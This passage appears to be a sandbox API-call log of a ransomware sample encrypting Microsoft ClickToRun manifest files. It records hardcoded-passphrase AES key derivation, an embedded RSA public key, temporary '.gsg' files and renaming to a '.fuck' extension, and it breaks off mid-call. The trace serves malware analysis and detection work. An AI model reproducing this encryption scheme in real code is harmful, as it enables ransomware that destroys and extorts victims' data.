CryptDestroyKey (hKey=0x27ebf20) returned 1 [0234.919] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.919] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0234.919] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0234.920] GetLastError () returned 0x5 [0234.920] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml")) returned 0x20 [0234.920] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml", dwFileAttributes=0x80) returned 0 [0234.920] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.920] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.921] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.921] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2793100) returned 1 [0234.930] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0234.930] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.930] CryptHashData (hHash=0x27eb860, pbData=0x279c648, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.931] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x27eb860, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x27ebde0) returned 1 [0234.931] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.931] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0234.931] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2791918) returned 1 [0234.934] CryptImportPublicKeyInfo (in: hCryptProv=0x2791918, dwCertEncodingType=0x1, pInfo=0x27967b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27967e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27967f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x27ebf60) returned 1 [0234.934] CryptEncrypt (in: hKey=0x27ebf60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0234.934] CryptEncrypt (in: hKey=0x27ebf60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792110*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2792110*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0234.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792110, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) returned 0 [0234.934] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9ce68*=0x0, lpOverlapped=0x0) returned 0 [0234.934] CryptEncrypt (in: hKey=0x27ebde0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9ce68*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9ce68*=0x10) returned 1 [0234.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) returned 0 [0234.935] CloseHandle (hObject=0xffffffff) returned 1 [0234.935] CloseHandle (hObject=0xffffffff) returned 1 [0234.935] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), bFailIfExists=0) returned 0 [0234.935] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml", dwFileAttributes=0x0) returned 0 [0234.935] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml.gsg")) returned 0 [0234.936] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml.fuck")) returned 0 [0234.936] CryptDestroyHash (hHash=0x27eb860) returned 1 [0234.936] CryptDestroyKey (hKey=0x27ebde0) returned 1 [0234.936] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.936] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0234.936] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0234.936] GetLastError () returned 0x5 [0234.936] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml")) returned 0x20 [0234.936] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml", dwFileAttributes=0x80) returned 0 [0234.937] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.937] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.937] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.937] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2793100) returned 1 [0234.948] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0234.948] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.948] CryptHashData (hHash=0x27ebda0, pbData=0x279c170, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.948] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x27ebda0, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x27ebd20) returned 1 [0234.948] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.948] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0234.948] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2791a28) returned 1 [0234.951] CryptImportPublicKeyInfo (in: hCryptProv=0x2791a28, dwCertEncodingType=0x1, pInfo=0x2795f98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2795fc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2795fd0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x27ebba0) returned 1 [0234.951] CryptEncrypt (in: hKey=0x27ebba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0234.952] CryptEncrypt (in: hKey=0x27ebba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27925d8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x27925d8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0234.952] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27925d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) returned 0 [0234.952] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9ce68*=0x0, lpOverlapped=0x0) returned 0 [0234.952] CryptEncrypt (in: hKey=0x27ebd20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9ce68*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9ce68*=0x10) returned 1 [0234.952] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) returned 0 [0234.952] CloseHandle (hObject=0xffffffff) returned 1 [0234.952] CloseHandle (hObject=0xffffffff) returned 1 [0234.952] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), bFailIfExists=0) returned 0 [0234.952] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml", dwFileAttributes=0x0) returned 0 [0234.953] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml.gsg")) returned 0 [0234.953] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml.fuck")) returned 0 [0234.953] CryptDestroyHash (hHash=0x27ebda0) returned 1 [0234.953] CryptDestroyKey (hKey=0x27ebd20) returned 1 [0234.953] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.954] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0234.954] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0234.954] GetLastError () returned 0x5 [0234.954] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml")) returned 0x20 [0234.955] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml", dwFileAttributes=0x80) returned 0 [0234.955] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.955] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.955] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.gsg", dwFileAttributes=0x2) returned 0 [0234.956] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2793100) returned 1 [0234.965] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0234.966] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0234.966] CryptHashData (hHash=0x27eba60, pbData=0x279c1c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.966] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x27eba60, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x27ebe60) returned 1 [0234.966] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.966] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0234.966] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2791ab0) returned 1 [0234.968] CryptImportPublicKeyInfo (in: hCryptProv=0x2791ab0, dwCertEncodingType=0x1, pInfo=0x2796068*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796098*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27960a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x27ebca0) returned 1 [0234.968] CryptEncrypt (in: hKey=0x27ebca0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0234.969] CryptEncrypt (in: hKey=0x27ebca0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792440*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2792440*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0234.969] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792440, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) returned 0 [0234.969] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9ce68*=0x0, lpOverlapped=0x0) returned 0 [0234.969] CryptEncrypt (in: hKey=0x27ebe60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9ce68*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9ce68*=0x10) returned 1 [0234.969] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0) returned 0 [0234.969] CloseHandle (hObject=0xffffffff) returned 1 [0234.969] CloseHandle (hObject=0xffffffff) returned 1 [0234.969] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), bFailIfExists=0) returned 0 [0234.969] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml", dwFileAttributes=0x0) returned 0 [0234.970] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml.gsg")) returned 0 [0234.970] MoveFileA 